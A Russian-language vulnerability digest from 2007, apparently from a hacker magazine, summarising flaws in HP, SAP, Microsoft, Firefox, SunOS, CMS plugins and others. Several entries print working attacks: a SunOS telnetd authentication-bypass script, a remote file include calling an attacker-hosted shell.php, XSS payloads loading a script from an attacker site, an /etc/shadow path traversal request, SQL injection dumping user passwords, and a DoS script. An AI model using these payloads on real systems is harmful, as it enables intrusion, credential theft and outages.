[ Bugtrack ]
Вот очередная пачка Багтрака езиноса...
Думаю ты будешь использовать эту инфу по назначению ;)
[ Доступ к файловой системе в HP OpenView Network Node Manager ]
Программа: HP OpenView Network Node Manager (NNM) 7.x
Уязвимость позволяет локальному злоумышленнику перезаписать произвольные файлы на целевой системе. Уязвимость
существует из-за того, что HP OpenView NNM Remote Console устанавливает небезопасные права доступа по умолчанию
(предоставляет группе "Everyone" права "Full Control") на директорию "HP OpenView" и дочерние объекты. Атакующий
может удалять, манипулировать и перемещать любые файлы приложения.
Пример:
C:\WINDOWS\system32\cmd.exe /C CALL cacls "C:\Program Files\HP OpenView" /T /C /P Everyone:F < "
C:\Program Files\HP OpenView\yes.txt" >> "C:\Program Files\HP OpenView\log\setup.log"
Данная команда меняет права доступа на C:\Program Files\HP OpenView директорию Everyone:Full Control.
[ Доступ к произвольным файлам в SAP Web Application Server ]
Программа: SAP Web Application Server 6.40
Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной информации на
целевой системе. Уязвимость существует из-за ошибки в проверке входных данных. Атакующий может загрузить произвольный
файл с целевой системы, например файл ..\..\..\..\..\..\Documents and Settings\All Users\Application Data\sapdb\wa\
httpreq.log, содержащий пароли.
Эксплоит: http://www.xakep.ru/post/36691/SAP_Web_Application_Server_Arbitrary_File_Disclosure_exploit.txt
[ Отказ в обслуживании в Axigen ]
Программа: Axigen 2.0.0b1
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за
ошибки в проверке входных данных. Атакующий может передать специально сформированные данные, что приведет к краху
приложения.
Эксплоиты:
http://www.xakep.ru/post/36692/Axigen_DoS_exploit1.txt
http://www.xakep.ru/post/36692/Axigen_DoS_exploit1.txt
[ Переполнение буфера в Microsoft Office ]
Программа: Microsoft Office
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует
из-за ошибки в проверке входных данных при обработке .xls документов. Атакующий может передать специально
сформированные .xls документы, что приведет к выполнению произвольного кода.
[ Переполнение буфера в GraphicsMagick ]
Программа: GraphicsMagick 1.1.7
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует
из-за ошибки в проверке входных данных в PALM DCM. Атакующий может передать специально сформированные данные, что
приведет к выполнению произвольного кода.
[ Множественные уязвимости в Mozilla Firefox ]
Программа: Mozilla Firefox
Найденные уязвимости позволяют удаленному злоумышленнику осуществить фишинг атаку и получить доступ к конфиденциальной
информации на целевой системе.
1) Уязвимость возникает из-за ошибки в механизме защиты от фишинга. Атакующий может добавить символ "/" в конец URL,
тем самым, обманув Firefox, выдав злонамеренный сайт за безопасный.
Пример:
Когда URL занесен в список фишинговых сайтов (Phishing List):
http://kaneda.bohater.net/phish.html - будет выведено предупреждение
http://kaneda.bohater.net//phish.html - предупреждения не будет
2) Уязвимость возникает из-за ошибки в проверке входных данных в Firefox Popup Blocker. Атакующий может использовать
XMLHttpRequest запрос и использовать URL вида file:///, что позволит ему получить содержимое произвольных файлов на
целевой системе.
Пример:
Content-type: text/html
Content-disposition: attachment; filename="foo.html"
<html><body><script>
x = new XMLHttpRequest;
x.open("GET", "file:///c:/BOOT.ini", false);
x.send(null);
alert("The script attempted to read your C:/BOOT.ini:\n\n" + x.responseText);
</script>
[ Отказ в обслуживании в GTK2 ]
Программа: GTK2
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за
ошибки в функции GDKPixBufLoader в проверке входных данных при обработке графических изображений. Атакующий может
передать специально сформированные данные, что приведет к отказу приложения, использующего библиотеку, в обслуживании.
Пример:
http://www.securityfocus.com/data/vulnerabilities/exploits/crash.mbox
[ Переполнение буфера в продуктах HP Mercury ]
Программа:
Mercury LoadRunner Agent 8.x
Mercury Monitor over Firewall 8.x
Mercury Performance Center Agent 8.x
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует
из-за ошибки в проверке входных данных в MCHAN.DLL при обработке пакетов, отправленных в MAGENTPROC.EXE на порт 54345/TCP.
Атакующий может передать специально сформированный пакет, содержащий слишком длинное поле "server_ip_name" на порт
54345/TCP, что приведет к переполнению стека и выполнению произвольного кода.
[ Отказ в обслуживании в Cisco IOS ]
Программа: Cisco IOS 12.4
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за
ошибки в проверке входных данных при обработке SIP пакетов. Атакующий может передать специально сформированные пакеты,
что приведет к отказу системы в обслуживании.
[ Обход ограничений безопасности в SunOS ]
Программа: SunOS 5.10/5.11
Уязвимость позволяет удаленному злоумышленнику механизм аутентификации на целевой системе. Уязвимость существует
из-за ошибки в проверке входных в in.telnetd. Атакующий может обойти механизм аутентификации на целевой системе.
Пример:
#!/bin/sh
# CLASSIFIED CONFIDENTIAL SOURCE MATERIAL
#
# *********************ATTENTION********************************
# THIS CODE _MUST NOT_ BE DISCLOSED TO ANY THIRD PARTIES
# (C) COPYRIGHT Kingcope, 2007
#
################################################################
echo ""
echo "SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope [email protected]"
if [ $# -ne 2 ]; then
echo "./sunos <host> <account>"
echo "./sunos localhost bin"
exit
fi
echo ""
echo "ALEX ALEX"
echo ""
telnet -l"-f$2" $1
[ PHP-инклюдинг в Openi CMS plugins ]
Программа: Openi CMS plugins
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость
существует из-за недостаточной обработки входных данных в параметре <config> сценарием index.php. Удаленный
пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
http://target-openi/open-admin/plugins/site_protection/index.php? config%5boi_dir%5d=http://attacker/shell.php ?
[ Межсайтовый скриптинг в Firefox Sage ]
Программа: Sage 1.x (extension for Firefox)
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за
недостаточной обработки входных данных при обработке опеределенных тегов в RSS полях. Атакующий может выполнить
произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
<channel>
<title>test</title>
<link>http://www.example.com/</link>
<description>test</description>
<item>
<title>test</title>
<content:encoded><![CDATA[
<SCRIPT/=''SRC='http://atackersite/xss.js'></SCRIPT>
]]>
</content:encoded>
</item>
</channel>
</rss>
[ Отказ в обслуживании в Microsoft Internet Explorer for Windows Mobile ]
Программа: Microsoft Internet Explorer for Windows Mobile 5.0
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за
ошибки в проверке входных данных при обработке WML страниц со злонамеренным содержанием. Атакующий может обманным
образом заставить пользователя открыть специально составленные страницы, что приведет к отказу приложения в обслуживании.
[ Доступ к произвольным файлам в IP3 NetAccess ]
Программа: IP3 NetAccess 4.1.9.6
Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной информации на
целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в параметре <filename> сценарием
getfile.cgi. Атакующий может получить содержимое произвольных файлов на целевой системе, включая /etc/shadow.
Пример:
http://$target/portalgroups/portalgroups/getfile.cgi?filename=../../../../../../../../etc/shadow
[ PHP-инклюдинг в OPENi-CMS Seitenschutz Plugin ]
Программа: Seitenschutz (plugin for OPENi-CMS) 1.x
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость
существует из-за недостаточной обработки входных данных в параметре <config> сценарием index.php. Удаленный пользователь
может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
http://target-openi/open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=http://attacker/shell.php?
[ Межсайтовый скриптинг в Qdig ]
Программа: Qdig
Уязвимость позволяет удаленному пользователю выполнить XSS нападение. Уязвимость существует из-за недостаточной
обработки входных данных в Quick Digital Image Gallery. Атакующий может выполнить произвольный сценарий в браузере
жертвы в контексте безопасности уязвимого сайта.
Примеры:
- /?Qwd=\0%22%3Cbody%20onload=alert(String.fromCharCode(88,83,83))%3E
- /?Qwd=\0%22%3Cbody%20onload=document.write(navigator.userAgent);%3E
[ Межсайтовый скриптинг в MoinMoin ]
Программа: MoinMoin 1.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за
недостаточной обработки входных данных в параметрах "hitcounts" и "general" на Info страницах. Атакующий может выполнить
произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
[ Переполнение буфера в CCC Cleaner ]
Программа: CCC Cleaner 1.x
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует
из-за ошибки в проверке входных данных при обработке UPX файлов. Атакующий может передать специально сформированные UPX
файлы, что приведет к выполнению произвольного кода.
[ Множественные уязвимости в Novell Identity Manager ]
Программа: Novell Identity Manager 3.x
Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной информации и
перезаписать произвольные файлы на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в
JBoss в методе "setBaseDir()". Атакующий может получить доступ к конфиденциальным данным и перезаписать произвольные
файлы на целевой системе.
[ Нарушение конфиденциальности информации в Plain Old Webserver (POW) ]
Программа: Plain Old Webserver (POW) 0.x
Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной информации и
перезаписать произвольные файлы на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных при
обработке HTTP запросов. Атакующий, используя символы обхода директорий, может получить доступ к конфиденциальным
данным на целевой системе.
Пример:
http://lists.grok.org.uk/pipermail/full-disclosure/2007-February/052303.html
[ Переполнение буфера в uTorrent ]
Программа: uTorrent 1.6
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за
ошибки в проверке входных данных. Атакующий может передать специально сформированные данные, что приведет к выполнению
произвольного кода.
Эксплоит: http://www.xakep.ru/post/36721/uTorrent_PoC_remote_exploit.txt
[ Переполнение буфера в Aruba Mobility Controller Management ]
Программа: Aruba Networks Mobility Controllers (200, 800, 2400, и 6000)
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за
ошибки в консольном и Web интерфейсе управления Aruba Mobility Controller при обработке входных данных. Атакующий может
передать специально сформированные данные большого размера в качестве вводимых учетных данных, что приведет к выполнению
произвольного кода.
[ Доступ к файловой системе в eXtreme File Hosting ]
Программа: eXtreme File Hosting 1.
Уязвимость позволяет удаленному злоумышленнику загрузить произвольные файлы на целевую систему. Уязвимость существует
из-за ошибки в проверке входных данных при обработке загрузок файлов на сервер, когда имя файла имеет множественные
расширения (например, .php.rar). Атакующий может загрузить злонамеренный сценарий в корневую web root директорию.
[ Обход ограничений безопасности в Aruba Networks ]
Программа: Aruba Networks Mobility Controllers (200, 800, 2400, и 6000)
Уязвимость позволяет удаленному злоумышленнику обойти ограничения безопасности на целевой системе. Уязвимость существует
из-за ошибки в проверке входных данных, в случае, когда злоумышленник имеет доступ к интерфейсу управления. Атакующий,
используя гостевую учетную запись Guest, может получить полный контроль над устройством или получить несанкционированный
доступ к WLAN.
[ Межсайтовый скриптинг в cPanel ]
Программа: cPanel 10.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за
недостаточной обработки входных данных в параметре <password> сценарием scripts/passwdmysql внутри WHM (WebHost Manager).
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
[ SQL-инъекция в Philboard ]
Программа: Philboard 1.14
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость
существует из-за недостаточной обработки входных данных в параметре <forumid> сценарием philboard_forum.asp. Удаленный
пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Примеры:
Username
philboard_forum.asp?forumid=-1+union+select+0,username, 2,3,4,5,6,7,8,7,8,9,10,11,12,13,14,15,16, 17,18+from+users
Password
philboard_forum.asp?forumid=-1+union+select+0,password, 2,3,4,5,6,7,8,7,8,9,10,11,12,13,14,15,16, 17,18+from+users
[ Множественные уязвимости в Virtual Calendar ]
Программа: Virtual Calendar
Уязвимости позволяют удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной информации на
целевой системе и произвести XSS нападение. Уязвимость существует из-за ошибки в установке прав доступа на файл
"pwd.txt". Атакующий может получить пароль администратора системы. Уязвимость существует из-за недостаточной обработки
входных данных в параметрах <sho>, <t> и <yr>. Атакующий может выполнить произвольный сценарий в браузере жертвы в
контексте безопасности уязвимого сайта.
[ Загрузка произвольных файлов в Microsoft Internet Explorer ]
Программа: Microsoft Internet Explorer 7
Уязвимости позволяют удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной информации на
целевой системе. Уязвимость существует из-за ошибки в безопасной обработке данных вводимых путем нажатия клавиш.
Эксплуатирование уязвимости требует, чтобы пользователь вручную ввел полный путь к файлам, которые атакующий хочет
выгрузить. Атакующий может использовать Web игры, получающие ввод от клавиатуры, блоги и другие страницы, для того,
чтобы заставить пользователя ввести необходимые символы и получить доступ к файлам на целевой системе.
Пример:
http://lcamtuf.coredump.cx/focusbug/ieversion.html
[ Загрузка произвольных файлов в Mozilla Firefox ]
Программа: Mozilla Firefox 1.5.0.9 и 2.0.0.1
Уязвимости позволяют удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной информации на
целевой системе. Уязвимость существует из-за ошибки в безопасной обработке данных вводимых путем нажатия клавиш.
Эксплуатирование уязвимости требует, чтобы пользователь вручную ввел полный путь к файлам, которые атакующий хочет
выгрузить. Атакующий может использовать Web игры, получающие ввод от клавиатуры, блоги и другие страницы, для того,
чтобы заставить пользователя ввести необходимые символы и получить доступ к файлам на целевой системе.
Пример:
http://lcamtuf.coredump.cx/focusbug/ffversion.html
[ Межсайтовый скриптинг в eWay ]
Программа: eWay
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за
недостаточной обработки входных данных в параметре <pid> сценарием default.aspx. Атакующий может выполнить произвольный
сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
[ Отказ в обслуживании в Linux Kernel 2.6 ]
Программа: Linux Kernel 2.6.x
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за
ошибки разыменования нулевого указателя в функции "key_alloc_serial()". Атакующий может передать специально
сформированные данные, что приведет к краху ядра.
[ Межсайтовый скриптинг в TaskFreak ]
Программа: TaskFreak 0.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за
недостаточной обработки входных данных в параметре <tznMessage> сценарием error.php. Атакующий может выполнить
произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
[ PHP-инклюдинг в AT Contenator ]
Программа: AT Contenator 1.0
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость
существует из-за недостаточной обработки входных данных в параметре <Root_To_Script> сценарием _admin/nav.php.
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Эксплоит: http://www.xakep.ru/post/36747/AT_Contenator_Remote_File_Include_Exploit.txt
[ SQL-инъекция в Xaran Cms ]
Программа: Xaran Cms 2.0
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость
существует из-за недостаточной обработки входных данных в параметре <id> сценарием xarancms_haupt.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных
приложения.
Эксплоит: http://www.xakep.ru/post/36748/Xaran_Cms_Remote_SQL_Injection_Exploit.txt
[ SQL-инъекция в phpCC ]
Программа: phpCC 4.2 beta
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость
существует из-за недостаточной обработки входных данных в параметре <npid> сценарием nickpage.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных
приложения.
Эксплоит: http://www.xakep.ru/post/36749/phpCC_Remote_SQL_Injection_Exploit.txt
[ Выполнение произвольного кода в Microsoft Malware Protection Engine ]
Программа:
Microsoft Antigen 9.x
Microsoft Forefront Security for Exchange Server
Microsoft Forefront Security for SharePoint
Microsoft Windows Defender
Microsoft Windows Live OneCare
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует
из-за ошибки в проверке входных данных при обработке PDF (Portable Document Format) файлов. Атакующий может передать
специально сформированные PDF файлы, сканирование которых приведет к выполнению произвольного кода.
Ссылка: http://www.microsoft.com/technet/security/Bulletin/MS07-010.mspx
[ Выполнение произвольного кода в Microsoft Interactive Training ]
Программа: Microsoft Interactive Training 3.x
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует
из-за ошибки в проверке входных данных при обработке Step-by-Step Interactive Training bookmark файлов ссылок
(.cbo, .cbl, .cbm). Атакующий может обманным образом заманить пользователя на злонамеренный сайт, что приведет к
выполнению произвольного кода.
Ссылка: http://www.microsoft.com/technet/security/Bulletin/MS07-005.mspx
[ Выполнение произвольного кода в Microsoft Windows HTML Help ActiveX компоненте ]
Программа:
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Server
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows XP Home Edition
Microsoft Windows XP Professional
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует
из-за того, что некоторые параметры не правильно инициализируются HTML ActiveX компонентой (Hhctrl.ocx) при обработки
определенных методов. Атакующий может обманным образом заманить пользователя на злонамеренный сайт, что приведет к
выполнению произвольного кода.
Ссылка: http://www.microsoft.com/technet/security/Bulletin/MS07-008.mspx
[ Выполнение произвольного кода в Microsoft RichEdit OLE Dialog ]
Программа:
Microsoft Access 2000
Microsoft Access 2002
Microsoft Access 2003
Microsoft Excel 2000
Microsoft Excel 2002
Microsoft Excel 2003
Microsoft Frontpage 2000
Microsoft Frontpage 2002
Microsoft Frontpage 2003
Microsoft InfoPath 2003
Microsoft Office 2000
Microsoft Office 2003 Professional Edition
Microsoft Office 2003 Proofing Tools
Microsoft Office 2004 for Mac
Microsoft OneNote 2003
Microsoft Outlook 2000
Microsoft Outlook 2002
Microsoft Outlook 2003
Microsoft Project 2002
Microsoft Project 2003
Microsoft Publisher 2000
Microsoft Publisher 2002
Microsoft Publisher 2003
Microsoft Visio 2002
Microsoft Visio 2003
Microsoft Word 2000
Microsoft Word 2002
Microsoft Word 2003
Microsoft Word 2003 Viewer
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за
ошибки в компонентах RichEdit в проверке входных данных при обработке OLE объектов в RTF (Rich Text Format) файлах.
Атакующий может передать специально сформированные RTF файлы, что приведет к порче памяти и возможному выполнению
произвольного кода.
Проверка на уязвимость: http://secunia.com/software_inspector/
Ссылка: http://www.microsoft.com/technet/security/Bulletin/MS07-013.mspx
[ Выполнение произвольного кода в Microsoft MFC OLE Dialog ]
Программа:
Microsoft Visual Studio .NET 2002
Microsoft Visual Studio .NET 2003
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за
ошибки в компоненте MFC в проверке входных данных при обработке OLE объектов в RTF (Rich Text Format) файлах.
Атакующий может передать специально сформированные RTF файлы, что приведет к порче памяти и возможному выполнению
произвольного кода.
Проверка на уязвимость: http://secunia.com/software_inspector/
Ссылка: http://www.microsoft.com/technet/security/Bulletin/MS07-012.mspx
[ Выполнение произвольного кода в Microsoft Windows OLE Dialog ]
Программа:
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Server
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Storage Server 2003
Microsoft Windows XP Home Edition
Microsoft Windows XP Professional
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует
из-за ошибки в компонентах Windows OLE Dialog в проверке входных данных при обработке OLE объектов в RTF
(Rich Text Format) файлах. Атакующий может передать специально сформированные RTF файлы, что приведет к порче памяти и
возможному выполнению произвольного кода.
Проверка на уязвимость: http://secunia.com/software_inspector/
Ссылка: http://www.microsoft.com/technet/security/Bulletin/MS07-011.mspx
[ Множественные уязвимости в Microsoft Internet Explorer ]
Программа:
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 6.x
Microsoft Internet Explorer 7.x
Найденные уязвимости позволяют удаленному злоумышленнику выполнить произвольный код на целевой системе.
1) Уязвимость возникает из-за ошибки в установке COM объектов (Imjpcksid.dll и Imjpskdic.dll), не предназначенных для
того, чтобы быть установленными в Internet Explorer. Эксплуатирование уязвимости приведет к порче участков памяти и
выполнению произвольного кода.
2) Уязвимость возникает из-за ошибки в установке COM объектов (Msb1fren.dll, Htmlmm.ocx, и Blnmgrps.dll), не
предназначенных для того, чтобы быть установленными в Internet Explorer. Эксплуатирование уязвимости приведет к порче
участков памяти и выполнению произвольного кода.
3) Уязвимость возникает из-за ошибки диапазона в wininet.dll в проверке входных данных при обработке ответов FTP
сервера. Атакующий может передать специально составленные ответы FTP клиенту, встроенному в Internet Explorer, что
приведет к порче участков памяти и выполнению произвольного кода.
Проверка на уязвимость: http://secunia.com/software_inspector/
Ссылка: http://www.microsoft.com/technet/security/Bulletin/MS07-016.mspx
[ Отказ в обслуживании и выполнение произвольного кода в Microsoft MDAC ADODB.Connection ActiveX компоненте ]
Программа: Microsoft Data Access Components (MDAC) 2.x
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код и осуществить DoS атаку на целевую систему.
Уязвимость существует из-за ошибки в ADODB.Connection ActiveX компоненте при обработке метода "Execute()". Атакующий
может передать специально сформированные параметры в уязвимый метод, что приведет к порче памяти и отказу системы в
обслуживании. Эксплуатирование уязвимости может также привести к выполнению произвольного кода, если пользователь
посетит злонамеренный сайт.
Проверка на уязвимость: http://secunia.com/software_inspector/
Ссылка: http://www.microsoft.com/technet/security/Bulletin/MS07-009.mspx
[ Повышение привилегий в сервисе Microsoft Windows Image Aquisition ]
Программа:
Microsoft Windows XP Home Edition
Microsoft Windows XP Professional
Уязвимость позволяет удаленному злоумышленнику выполнить вредоносные действия с повышенными привилегиями на целевой
системе. Уязвимость существует из-за ошибки в проверке входных данных в Windows Image Acquisition service.
Атакующий может передать специально сформированные данные, что приведет к выполнению произвольного кода с повышенными
привилегиями.
Проверка на уязвимость: http://secunia.com/software_inspector/
Ссылка: http://www.microsoft.com/technet/security/Bulletin/MS07-007.mspx
[ Повышение привилегий в Microsoft Windows Shell ]
Программа:
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows XP Professional
Уязвимость позволяет удаленному злоумышленнику выполнить вредоносные действия с повышенными привилегиями на целевой
системе. Уязвимость существует из-за ошибки в Windows Shell при определении и регистрации нового аппаратного
обеспечения. Атакующий может передать специально сформированные данные, что приведет к выполнению произвольного
кода с повышенными привилегиями.
Проверка на уязвимость: http://secunia.com/software_inspector/
Ссылка: http://www.microsoft.com/technet/security/Bulletin/MS07-006.mspx
[ Раскрытие конфиденциальных данных в Lotus Domino Webmail ]
Программа: Lotus Domino R6 Webmail
Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной информации на
целевой системе. Уязвимость существует из-за того, что Lotus Domino R5 и R6 WebMail, с включенной опцией "Generate
HTML for all fields" сохраняет конфиденциальные сведения из names.nsf в скрытых полях формы. Атакующий может прочитать
код HTML и получить конфиденциальные сведения, такие как хэш пароля в поле HTTPPassword, дата смены пароля в поле
HTTPPasswordChangeDate, платформа клиента в поле ClntPltfrm, имя компьютера клиента в поле ClntMachine, и версию релиза
клиента Lotus Domino в поле ClntBld.
Эксплоит: http://www.xakep.ru/post/36780/Lotus_Domino_R6_Webmail_exploit.txt
[ Нарушение конфиденциальности информации в Portable OpenSSH ]
Программа: Portable OpenSSH 3.6.1p-PAM / 4.1-SUSE
Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной информации на
целевой системе. Уязвимость существует из-за того, что OpenSSH-portable 3.6.1p1 и ранние версии с поддержкой PAM
мгновенно отправляют сообщения об ошибке, если запрошенный пользователь не существует в системе. Атакующий, используя
анализ времени, может получить список существующих пользователей.
Эксплоит: http://www.xakep.ru/post/36781/OpenSSH_remote_timing_attack_exploit.txt
[ Доступ к файловой системе в Hewlett-Packard HP-UX SLSd ]
Программа: Hewlett-Packard HP-UX SLSd
Атакующий может создавать произвольные файлы на целевой системе. Уязвимость существует из-за ошибки в демоне
распределенного логического экрана Distributed Single Logical Screen (SLS/d) при обработке входных запросов.
Атакующий может отправить специально сформированный запрос, что заставит демона записать предоставленные атакующим
данные в произвольный файл на целевой системе.
[ Выполнение произвольных команд в Advanced Poll ]
Программа: Advanced Poll 2.0.5-dev
Уязвимость позволяет удаленному пользователю выполнить произвольную команду на целевой системе. Уязвимость существует
из-за недостаточной обработки входных данных в параметре <session> сценарием index.php. Удаленный пользователь может
выполнить произвольную команду на целевой системе с привилегиями Web сервера.
Эксплоит: http://www.xakep.ru/post/36783/Advanced_Poll_exploit.txt
[ Переполнение буфера в HP Mercury LoadRunner ]
Программа:
Mercury LoadRunner Agent 8.1
Mercury LoadRunner Agent 8.0
Mercury Performance Center Agent 8.1
Mercury Performance Center Agent 8.0
Mercury Monitor over Firewall 8.1
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует
из-за ошибки в процессе magentproc.exe (который открывает TCP порт 54345) при обработке пакетов, содержащих слишком
длинное поле 'server_ip_name'. Атакующий может передать специально сформированные данные, в результате чего будет
вызвана функция strcpy() из библиотеки mchan.dll, работа которой приведет к выполнению произвольного кода.
[ Переполнение буфера в Total Video Player ]
Программа: Total Video Player 1.x
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует
из-за ошибки в проверке входных данных при обработке M3U playlist файлов, содержащих слишком длинные имена файлов
(более 1000 байт). Атакующий может передать специально сформированный playlist файл, что приведет к выполнению
произвольного кода.
[ Отказ в обслуживании в MiniWebsvr ]
Программа: MiniWebsvr 0.0.6
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за
ошибки в проверке входных данных при обработке HTTP GET запросов. Атакующий может передать специально сформированные
HTTP GET запросы, что приведет к отказу системы в обслуживании.
Пример:
import socket
print
"-----------------------------------------------------------------------"
print "MiniWebsvr 0.0.6 (0-Day) Resource Consumption"
print "url: http://miniwebsvr.sourceforge.net/"
print "author: shinnai"
print "mail: shinnai[at]autistici[dot]org"
print "site: http://shinnai.altervista.org"
print "Run this exploit and take a look to the CPU usage."
print
"-----------------------------------------------------------------------"
host = "127.0.0.1"
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
for i in range (0,3):
request = "GET /prn.htm HTTP/1.1 \n\n"
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((host, port))
connection.send(request)
print i
except:
print "Unable to connect. exiting."
[ Межсайтовый скриптинг в @Mail ]
Программа: @Mail 4.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за
недостаточной обработки входных данных в параметре <keywords> сценарием search.pl. Атакующий может выполнить
произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
http://localhost/search.pl?func=searchhelp&keywords="><script>alert(document.forms.keywords)</script>&Submit2=Search
[ Выполнение произвольного кода в Drupal ]
Программа:
Drupal 5.1
Drupal 4.7.6
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует
из-за ошибки в процедуре проверки комментариев, оставленных пользователями. Атакующий с правами 'post comments' и
доступом более чем в один фильтр ввода может передать специально сформированные комментарии, что приведет к выполнению
произвольного кода.
Эксплоит для Drupal 5.1: http://www.xakep.ru/post/36796/Drupal_Remote_Command_Execution_Exploit1.txt
Эксплоит для Drupal 4.7: http://www.xakep.ru/post/36796/Drupal_Remote_Command_Execution_Exploit2.txt
[ Отказ в обслуживании в MailEnable Professional/Enterprise ]
Программа:
MailEnable Professional/Enterprise 2.35
MailEnable Professional/Enterprise 2.37
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за
ошибки в проверке границ входных данных. Атакующий может передать специально сформированные данные, что приведет к
отказу системы в обслуживании.
Эксплоит для Mail Enable Professional/Enterprise v2.32-7: http://www.xakep.ru/post/36797/Mail_Enable_DoS_Exploit1.txt
Эксплоит для Mail Enable Professional/Enterprise <=v2.35: http://www.xakep.ru/post/36797/Mail_Enable_DoS_Exploit2.txt
[ Отказ в обслуживании в ActSoft DVD-Tools ActiveX компоненте ]
Программа: ActSoft DVD-Tools для Internet Explorer 7
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за
ошибки в проверке входных данных в dvdtools.ocx. Атакующий может передать специально сформированные данные большого
размера (более 400 байт), что приведет к отказу в обслуживании Internet Explorer.
